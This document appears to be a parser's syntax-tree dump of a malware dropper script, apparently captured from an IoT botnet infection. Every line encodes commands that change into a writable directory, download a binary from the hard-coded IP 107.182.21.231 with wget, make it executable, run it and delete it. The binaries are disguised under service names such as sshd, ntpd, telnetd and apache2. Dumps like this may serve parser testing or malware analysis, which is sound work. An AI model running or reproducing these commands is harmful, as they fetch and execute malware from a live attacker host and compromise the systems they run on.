ListNode(lineno=2, pos=(12, 134), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 98), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 98), word='http://107.182.21.231/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(98, 99)),
  CommandNode(lineno=2, pos=(100, 113), parts=[
    WordNode(lineno=2, pos=(100, 105), word='chmod'),
    WordNode(lineno=2, pos=(106, 108), word='+x'),
    WordNode(lineno=2, pos=(109, 113), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(113, 114)),
  CommandNode(lineno=2, pos=(115, 121), parts=[
    WordNode(lineno=2, pos=(115, 121), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 134), parts=[
    WordNode(lineno=2, pos=(123, 125), word='rm'),
    WordNode(lineno=2, pos=(126, 129), word='-rf'),
    WordNode(lineno=2, pos=(130, 134), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(135, 257), parts=[
  CommandNode(lineno=3, pos=(135, 142), parts=[
    WordNode(lineno=3, pos=(135, 137), word='cd'),
    WordNode(lineno=3, pos=(138, 142), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(143, 145)),
  CommandNode(lineno=3, pos=(146, 157), parts=[
    WordNode(lineno=3, pos=(146, 148), word='cd'),
    WordNode(lineno=3, pos=(149, 157), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(158, 160)),
  CommandNode(lineno=3, pos=(161, 168), parts=[
    WordNode(lineno=3, pos=(161, 163), word='cd'),
    WordNode(lineno=3, pos=(164, 168), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(169, 171)),
  CommandNode(lineno=3, pos=(172, 180), parts=[
    WordNode(lineno=3, pos=(172, 174), word='cd'),
    WordNode(lineno=3, pos=(175, 180), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(181, 183)),
  CommandNode(lineno=3, pos=(184, 188), parts=[
    WordNode(lineno=3, pos=(184, 186), word='cd'),
    WordNode(lineno=3, pos=(187, 188), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(188, 189)),
  CommandNode(lineno=3, pos=(190, 221), parts=[
    WordNode(lineno=3, pos=(190, 194), word='wget'),
    WordNode(lineno=3, pos=(195, 221), word='http://107.182.21.231/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(221, 222)),
  CommandNode(lineno=3, pos=(223, 236), parts=[
    WordNode(lineno=3, pos=(223, 228), word='chmod'),
    WordNode(lineno=3, pos=(229, 231), word='+x'),
    WordNode(lineno=3, pos=(232, 236), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(236, 237)),
  CommandNode(lineno=3, pos=(238, 244), parts=[
    WordNode(lineno=3, pos=(238, 244), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(244, 245)),
  CommandNode(lineno=3, pos=(246, 257), parts=[
    WordNode(lineno=3, pos=(246, 248), word='rm'),
    WordNode(lineno=3, pos=(249, 252), word='-rf'),
    WordNode(lineno=3, pos=(253, 257), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(258, 392), parts=[
  CommandNode(lineno=4, pos=(258, 265), parts=[
    WordNode(lineno=4, pos=(258, 260), word='cd'),
    WordNode(lineno=4, pos=(261, 265), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(266, 268)),
  CommandNode(lineno=4, pos=(269, 280), parts=[
    WordNode(lineno=4, pos=(269, 271), word='cd'),
    WordNode(lineno=4, pos=(272, 280), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(281, 283)),
  CommandNode(lineno=4, pos=(284, 291), parts=[
    WordNode(lineno=4, pos=(284, 286), word='cd'),
    WordNode(lineno=4, pos=(287, 291), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(292, 294)),
  CommandNode(lineno=4, pos=(295, 303), parts=[
    WordNode(lineno=4, pos=(295, 297), word='cd'),
    WordNode(lineno=4, pos=(298, 303), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(304, 306)),
  CommandNode(lineno=4, pos=(307, 311), parts=[
    WordNode(lineno=4, pos=(307, 309), word='cd'),
    WordNode(lineno=4, pos=(310, 311), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(311, 312)),
  CommandNode(lineno=4, pos=(313, 347), parts=[
    WordNode(lineno=4, pos=(313, 317), word='wget'),
    WordNode(lineno=4, pos=(318, 347), word='http://107.182.21.231/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(347, 348)),
  CommandNode(lineno=4, pos=(349, 365), parts=[
    WordNode(lineno=4, pos=(349, 354), word='chmod'),
    WordNode(lineno=4, pos=(355, 357), word='+x'),
    WordNode(lineno=4, pos=(358, 365), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(365, 366)),
  CommandNode(lineno=4, pos=(367, 376), parts=[
    WordNode(lineno=4, pos=(367, 376), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(376, 377)),
  CommandNode(lineno=4, pos=(378, 392), parts=[
    WordNode(lineno=4, pos=(378, 380), word='rm'),
    WordNode(lineno=4, pos=(381, 384), word='-rf'),
    WordNode(lineno=4, pos=(385, 392), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(393, 515), parts=[
  CommandNode(lineno=5, pos=(393, 400), parts=[
    WordNode(lineno=5, pos=(393, 395), word='cd'),
    WordNode(lineno=5, pos=(396, 400), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(401, 403)),
  CommandNode(lineno=5, pos=(404, 415), parts=[
    WordNode(lineno=5, pos=(404, 406), word='cd'),
    WordNode(lineno=5, pos=(407, 415), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(416, 418)),
  CommandNode(lineno=5, pos=(419, 426), parts=[
    WordNode(lineno=5, pos=(419, 421), word='cd'),
    WordNode(lineno=5, pos=(422, 426), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(427, 429)),
  CommandNode(lineno=5, pos=(430, 438), parts=[
    WordNode(lineno=5, pos=(430, 432), word='cd'),
    WordNode(lineno=5, pos=(433, 438), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(439, 441)),
  CommandNode(lineno=5, pos=(442, 446), parts=[
    WordNode(lineno=5, pos=(442, 444), word='cd'),
    WordNode(lineno=5, pos=(445, 446), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(446, 447)),
  CommandNode(lineno=5, pos=(448, 479), parts=[
    WordNode(lineno=5, pos=(448, 452), word='wget'),
    WordNode(lineno=5, pos=(453, 479), word='http://107.182.21.231/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(479, 480)),
  CommandNode(lineno=5, pos=(481, 494), parts=[
    WordNode(lineno=5, pos=(481, 486), word='chmod'),
    WordNode(lineno=5, pos=(487, 489), word='+x'),
    WordNode(lineno=5, pos=(490, 494), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(494, 495)),
  CommandNode(lineno=5, pos=(496, 502), parts=[
    WordNode(lineno=5, pos=(496, 502), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(502, 503)),
  CommandNode(lineno=5, pos=(504, 515), parts=[
    WordNode(lineno=5, pos=(504, 506), word='rm'),
    WordNode(lineno=5, pos=(507, 510), word='-rf'),
    WordNode(lineno=5, pos=(511, 515), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(516, 638), parts=[
  CommandNode(lineno=6, pos=(516, 523), parts=[
    WordNode(lineno=6, pos=(516, 518), word='cd'),
    WordNode(lineno=6, pos=(519, 523), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(524, 526)),
  CommandNode(lineno=6, pos=(527, 538), parts=[
    WordNode(lineno=6, pos=(527, 529), word='cd'),
    WordNode(lineno=6, pos=(530, 538), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(539, 541)),
  CommandNode(lineno=6, pos=(542, 549), parts=[
    WordNode(lineno=6, pos=(542, 544), word='cd'),
    WordNode(lineno=6, pos=(545, 549), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(550, 552)),
  CommandNode(lineno=6, pos=(553, 561), parts=[
    WordNode(lineno=6, pos=(553, 555), word='cd'),
    WordNode(lineno=6, pos=(556, 561), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(562, 564)),
  CommandNode(lineno=6, pos=(565, 569), parts=[
    WordNode(lineno=6, pos=(565, 567), word='cd'),
    WordNode(lineno=6, pos=(568, 569), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(569, 570)),
  CommandNode(lineno=6, pos=(571, 602), parts=[
    WordNode(lineno=6, pos=(571, 575), word='wget'),
    WordNode(lineno=6, pos=(576, 602), word='http://107.182.21.231/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(602, 603)),
  CommandNode(lineno=6, pos=(604, 617), parts=[
    WordNode(lineno=6, pos=(604, 609), word='chmod'),
    WordNode(lineno=6, pos=(610, 612), word='+x'),
    WordNode(lineno=6, pos=(613, 617), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(617, 618)),
  CommandNode(lineno=6, pos=(619, 625), parts=[
    WordNode(lineno=6, pos=(619, 625), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(625, 626)),
  CommandNode(lineno=6, pos=(627, 638), parts=[
    WordNode(lineno=6, pos=(627, 629), word='rm'),
    WordNode(lineno=6, pos=(630, 633), word='-rf'),
    WordNode(lineno=6, pos=(634, 638), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(639, 761), parts=[
  CommandNode(lineno=7, pos=(639, 646), parts=[
    WordNode(lineno=7, pos=(639, 641), word='cd'),
    WordNode(lineno=7, pos=(642, 646), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(647, 649)),
  CommandNode(lineno=7, pos=(650, 661), parts=[
    WordNode(lineno=7, pos=(650, 652), word='cd'),
    WordNode(lineno=7, pos=(653, 661), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(662, 664)),
  CommandNode(lineno=7, pos=(665, 672), parts=[
    WordNode(lineno=7, pos=(665, 667), word='cd'),
    WordNode(lineno=7, pos=(668, 672), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(673, 675)),
  CommandNode(lineno=7, pos=(676, 684), parts=[
    WordNode(lineno=7, pos=(676, 678), word='cd'),
    WordNode(lineno=7, pos=(679, 684), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(685, 687)),
  CommandNode(lineno=7, pos=(688, 692), parts=[
    WordNode(lineno=7, pos=(688, 690), word='cd'),
    WordNode(lineno=7, pos=(691, 692), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(692, 693)),
  CommandNode(lineno=7, pos=(694, 725), parts=[
    WordNode(lineno=7, pos=(694, 698), word='wget'),
    WordNode(lineno=7, pos=(699, 725), word='http://107.182.21.231/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(725, 726)),
  CommandNode(lineno=7, pos=(727, 740), parts=[
    WordNode(lineno=7, pos=(727, 732), word='chmod'),
    WordNode(lineno=7, pos=(733, 735), word='+x'),
    WordNode(lineno=7, pos=(736, 740), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(740, 741)),
  CommandNode(lineno=7, pos=(742, 748), parts=[
    WordNode(lineno=7, pos=(742, 748), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(748, 749)),
  CommandNode(lineno=7, pos=(750, 761), parts=[
    WordNode(lineno=7, pos=(750, 752), word='rm'),
    WordNode(lineno=7, pos=(753, 756), word='-rf'),
    WordNode(lineno=7, pos=(757, 761), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(762, 884), parts=[
  CommandNode(lineno=8, pos=(762, 769), parts=[
    WordNode(lineno=8, pos=(762, 764), word='cd'),
    WordNode(lineno=8, pos=(765, 769), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(770, 772)),
  CommandNode(lineno=8, pos=(773, 784), parts=[
    WordNode(lineno=8, pos=(773, 775), word='cd'),
    WordNode(lineno=8, pos=(776, 784), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(785, 787)),
  CommandNode(lineno=8, pos=(788, 795), parts=[
    WordNode(lineno=8, pos=(788, 790), word='cd'),
    WordNode(lineno=8, pos=(791, 795), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(796, 798)),
  CommandNode(lineno=8, pos=(799, 807), parts=[
    WordNode(lineno=8, pos=(799, 801), word='cd'),
    WordNode(lineno=8, pos=(802, 807), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(808, 810)),
  CommandNode(lineno=8, pos=(811, 815), parts=[
    WordNode(lineno=8, pos=(811, 813), word='cd'),
    WordNode(lineno=8, pos=(814, 815), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(815, 816)),
  CommandNode(lineno=8, pos=(817, 848), parts=[
    WordNode(lineno=8, pos=(817, 821), word='wget'),
    WordNode(lineno=8, pos=(822, 848), word='http://107.182.21.231/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(848, 849)),
  CommandNode(lineno=8, pos=(850, 863), parts=[
    WordNode(lineno=8, pos=(850, 855), word='chmod'),
    WordNode(lineno=8, pos=(856, 858), word='+x'),
    WordNode(lineno=8, pos=(859, 863), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(863, 864)),
  CommandNode(lineno=8, pos=(865, 871), parts=[
    WordNode(lineno=8, pos=(865, 871), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(871, 872)),
  CommandNode(lineno=8, pos=(873, 884), parts=[
    WordNode(lineno=8, pos=(873, 875), word='rm'),
    WordNode(lineno=8, pos=(876, 879), word='-rf'),
    WordNode(lineno=8, pos=(880, 884), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(885, 1003), parts=[
  CommandNode(lineno=9, pos=(885, 892), parts=[
    WordNode(lineno=9, pos=(885, 887), word='cd'),
    WordNode(lineno=9, pos=(888, 892), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(893, 895)),
  CommandNode(lineno=9, pos=(896, 907), parts=[
    WordNode(lineno=9, pos=(896, 898), word='cd'),
    WordNode(lineno=9, pos=(899, 907), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(908, 910)),
  CommandNode(lineno=9, pos=(911, 918), parts=[
    WordNode(lineno=9, pos=(911, 913), word='cd'),
    WordNode(lineno=9, pos=(914, 918), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(919, 921)),
  CommandNode(lineno=9, pos=(922, 930), parts=[
    WordNode(lineno=9, pos=(922, 924), word='cd'),
    WordNode(lineno=9, pos=(925, 930), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(931, 933)),
  CommandNode(lineno=9, pos=(934, 938), parts=[
    WordNode(lineno=9, pos=(934, 936), word='cd'),
    WordNode(lineno=9, pos=(937, 938), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(938, 939)),
  CommandNode(lineno=9, pos=(940, 970), parts=[
    WordNode(lineno=9, pos=(940, 944), word='wget'),
    WordNode(lineno=9, pos=(945, 970), word='http://107.182.21.231/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(970, 971)),
  CommandNode(lineno=9, pos=(972, 984), parts=[
    WordNode(lineno=9, pos=(972, 977), word='chmod'),
    WordNode(lineno=9, pos=(978, 980), word='+x'),
    WordNode(lineno=9, pos=(981, 984), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(984, 985)),
  CommandNode(lineno=9, pos=(986, 991), parts=[
    WordNode(lineno=9, pos=(986, 991), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(991, 992)),
  CommandNode(lineno=9, pos=(993, 1003), parts=[
    WordNode(lineno=9, pos=(993, 995), word='rm'),
    WordNode(lineno=9, pos=(996, 999), word='-rf'),
    WordNode(lineno=9, pos=(1000, 1003), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1004, 1126), parts=[
  CommandNode(lineno=10, pos=(1004, 1011), parts=[
    WordNode(lineno=10, pos=(1004, 1006), word='cd'),
    WordNode(lineno=10, pos=(1007, 1011), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1012, 1014)),
  CommandNode(lineno=10, pos=(1015, 1026), parts=[
    WordNode(lineno=10, pos=(1015, 1017), word='cd'),
    WordNode(lineno=10, pos=(1018, 1026), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1027, 1029)),
  CommandNode(lineno=10, pos=(1030, 1037), parts=[
    WordNode(lineno=10, pos=(1030, 1032), word='cd'),
    WordNode(lineno=10, pos=(1033, 1037), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1038, 1040)),
  CommandNode(lineno=10, pos=(1041, 1049), parts=[
    WordNode(lineno=10, pos=(1041, 1043), word='cd'),
    WordNode(lineno=10, pos=(1044, 1049), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1050, 1052)),
  CommandNode(lineno=10, pos=(1053, 1057), parts=[
    WordNode(lineno=10, pos=(1053, 1055), word='cd'),
    WordNode(lineno=10, pos=(1056, 1057), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1057, 1058)),
  CommandNode(lineno=10, pos=(1059, 1090), parts=[
    WordNode(lineno=10, pos=(1059, 1063), word='wget'),
    WordNode(lineno=10, pos=(1064, 1090), word='http://107.182.21.231/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1090, 1091)),
  CommandNode(lineno=10, pos=(1092, 1105), parts=[
    WordNode(lineno=10, pos=(1092, 1097), word='chmod'),
    WordNode(lineno=10, pos=(1098, 1100), word='+x'),
    WordNode(lineno=10, pos=(1101, 1105), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1105, 1106)),
  CommandNode(lineno=10, pos=(1107, 1113), parts=[
    WordNode(lineno=10, pos=(1107, 1113), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1113, 1114)),
  CommandNode(lineno=10, pos=(1115, 1126), parts=[
    WordNode(lineno=10, pos=(1115, 1117), word='rm'),
    WordNode(lineno=10, pos=(1118, 1121), word='-rf'),
    WordNode(lineno=10, pos=(1122, 1126), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1127, 1241), parts=[
  CommandNode(lineno=11, pos=(1127, 1134), parts=[
    WordNode(lineno=11, pos=(1127, 1129), word='cd'),
    WordNode(lineno=11, pos=(1130, 1134), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1135, 1137)),
  CommandNode(lineno=11, pos=(1138, 1149), parts=[
    WordNode(lineno=11, pos=(1138, 1140), word='cd'),
    WordNode(lineno=11, pos=(1141, 1149), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1150, 1152)),
  CommandNode(lineno=11, pos=(1153, 1160), parts=[
    WordNode(lineno=11, pos=(1153, 1155), word='cd'),
    WordNode(lineno=11, pos=(1156, 1160), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1161, 1163)),
  CommandNode(lineno=11, pos=(1164, 1172), parts=[
    WordNode(lineno=11, pos=(1164, 1166), word='cd'),
    WordNode(lineno=11, pos=(1167, 1172), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1173, 1175)),
  CommandNode(lineno=11, pos=(1176, 1180), parts=[
    WordNode(lineno=11, pos=(1176, 1178), word='cd'),
    WordNode(lineno=11, pos=(1179, 1180), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1180, 1181)),
  CommandNode(lineno=11, pos=(1182, 1211), parts=[
    WordNode(lineno=11, pos=(1182, 1186), word='wget'),
    WordNode(lineno=11, pos=(1187, 1211), word='http://107.182.21.231/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1211, 1212)),
  CommandNode(lineno=11, pos=(1213, 1224), parts=[
    WordNode(lineno=11, pos=(1213, 1218), word='chmod'),
    WordNode(lineno=11, pos=(1219, 1221), word='+x'),
    WordNode(lineno=11, pos=(1222, 1224), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1224, 1225)),
  CommandNode(lineno=11, pos=(1226, 1230), parts=[
    WordNode(lineno=11, pos=(1226, 1230), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1230, 1231)),
  CommandNode(lineno=11, pos=(1232, 1241), parts=[
    WordNode(lineno=11, pos=(1232, 1234), word='rm'),
    WordNode(lineno=11, pos=(1235, 1238), word='-rf'),
    WordNode(lineno=11, pos=(1239, 1241), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1242, 1364), parts=[
  CommandNode(lineno=12, pos=(1242, 1249), parts=[
    WordNode(lineno=12, pos=(1242, 1244), word='cd'),
    WordNode(lineno=12, pos=(1245, 1249), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1250, 1252)),
  CommandNode(lineno=12, pos=(1253, 1264), parts=[
    WordNode(lineno=12, pos=(1253, 1255), word='cd'),
    WordNode(lineno=12, pos=(1256, 1264), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1265, 1267)),
  CommandNode(lineno=12, pos=(1268, 1275), parts=[
    WordNode(lineno=12, pos=(1268, 1270), word='cd'),
    WordNode(lineno=12, pos=(1271, 1275), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1276, 1278)),
  CommandNode(lineno=12, pos=(1279, 1287), parts=[
    WordNode(lineno=12, pos=(1279, 1281), word='cd'),
    WordNode(lineno=12, pos=(1282, 1287), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1288, 1290)),
  CommandNode(lineno=12, pos=(1291, 1295), parts=[
    WordNode(lineno=12, pos=(1291, 1293), word='cd'),
    WordNode(lineno=12, pos=(1294, 1295), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1295, 1296)),
  CommandNode(lineno=12, pos=(1297, 1328), parts=[
    WordNode(lineno=12, pos=(1297, 1301), word='wget'),
    WordNode(lineno=12, pos=(1302, 1328), word='http://107.182.21.231/arm5'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1328, 1329)),
  CommandNode(lineno=12, pos=(1330, 1343), parts=[
    WordNode(lineno=12, pos=(1330, 1335), word='chmod'),
    WordNode(lineno=12, pos=(1336, 1338), word='+x'),
    WordNode(lineno=12, pos=(1339, 1343), word='arm5'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1343, 1344)),
  CommandNode(lineno=12, pos=(1345, 1351), parts=[
    WordNode(lineno=12, pos=(1345, 1351), word='./arm5'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1351, 1352)),
  CommandNode(lineno=12, pos=(1353, 1364), parts=[
    WordNode(lineno=12, pos=(1353, 1355), word='rm'),
    WordNode(lineno=12, pos=(1356, 1359), word='-rf'),
    WordNode(lineno=12, pos=(1360, 1364), word='arm5'),
  ]),
])
ListNode(lineno=13, pos=(1365, 1499), parts=[
  CommandNode(lineno=13, pos=(1365, 1372), parts=[
    WordNode(lineno=13, pos=(1365, 1367), word='cd'),
    WordNode(lineno=13, pos=(1368, 1372), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1373, 1375)),
  CommandNode(lineno=13, pos=(1376, 1387), parts=[
    WordNode(lineno=13, pos=(1376, 1378), word='cd'),
    WordNode(lineno=13, pos=(1379, 1387), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1388, 1390)),
  CommandNode(lineno=13, pos=(1391, 1398), parts=[
    WordNode(lineno=13, pos=(1391, 1393), word='cd'),
    WordNode(lineno=13, pos=(1394, 1398), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1399, 1401)),
  CommandNode(lineno=13, pos=(1402, 1410), parts=[
    WordNode(lineno=13, pos=(1402, 1404), word='cd'),
    WordNode(lineno=13, pos=(1405, 1410), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1411, 1413)),
  CommandNode(lineno=13, pos=(1414, 1418), parts=[
    WordNode(lineno=13, pos=(1414, 1416), word='cd'),
    WordNode(lineno=13, pos=(1417, 1418), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1418, 1419)),
  CommandNode(lineno=13, pos=(1420, 1454), parts=[
    WordNode(lineno=13, pos=(1420, 1424), word='wget'),
    WordNode(lineno=13, pos=(1425, 1454), word='http://107.182.21.231/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1454, 1455)),
  CommandNode(lineno=13, pos=(1456, 1472), parts=[
    WordNode(lineno=13, pos=(1456, 1461), word='chmod'),
    WordNode(lineno=13, pos=(1462, 1464), word='+x'),
    WordNode(lineno=13, pos=(1465, 1472), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1472, 1473)),
  CommandNode(lineno=13, pos=(1474, 1483), parts=[
    WordNode(lineno=13, pos=(1474, 1483), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1483, 1484)),
  CommandNode(lineno=13, pos=(1485, 1499), parts=[
    WordNode(lineno=13, pos=(1485, 1487), word='rm'),
    WordNode(lineno=13, pos=(1488, 1491), word='-rf'),
    WordNode(lineno=13, pos=(1492, 1499), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1500, 1634), parts=[
  CommandNode(lineno=14, pos=(1500, 1507), parts=[
    WordNode(lineno=14, pos=(1500, 1502), word='cd'),
    WordNode(lineno=14, pos=(1503, 1507), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1508, 1510)),
  CommandNode(lineno=14, pos=(1511, 1522), parts=[
    WordNode(lineno=14, pos=(1511, 1513), word='cd'),
    WordNode(lineno=14, pos=(1514, 1522), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1523, 1525)),
  CommandNode(lineno=14, pos=(1526, 1533), parts=[
    WordNode(lineno=14, pos=(1526, 1528), word='cd'),
    WordNode(lineno=14, pos=(1529, 1533), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1534, 1536)),
  CommandNode(lineno=14, pos=(1537, 1545), parts=[
    WordNode(lineno=14, pos=(1537, 1539), word='cd'),
    WordNode(lineno=14, pos=(1540, 1545), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1546, 1548)),
  CommandNode(lineno=14, pos=(1549, 1553), parts=[
    WordNode(lineno=14, pos=(1549, 1551), word='cd'),
    WordNode(lineno=14, pos=(1552, 1553), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1553, 1554)),
  CommandNode(lineno=14, pos=(1555, 1589), parts=[
    WordNode(lineno=14, pos=(1555, 1559), word='wget'),
    WordNode(lineno=14, pos=(1560, 1589), word='http://107.182.21.231/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1589, 1590)),
  CommandNode(lineno=14, pos=(1591, 1607), parts=[
    WordNode(lineno=14, pos=(1591, 1596), word='chmod'),
    WordNode(lineno=14, pos=(1597, 1599), word='+x'),
    WordNode(lineno=14, pos=(1600, 1607), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1607, 1608)),
  CommandNode(lineno=14, pos=(1609, 1618), parts=[
    WordNode(lineno=14, pos=(1609, 1618), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1618, 1619)),
  CommandNode(lineno=14, pos=(1620, 1634), parts=[
    WordNode(lineno=14, pos=(1620, 1622), word='rm'),
    WordNode(lineno=14, pos=(1623, 1626), word='-rf'),
    WordNode(lineno=14, pos=(1627, 1634), word='telnetd'),
  ]),
])
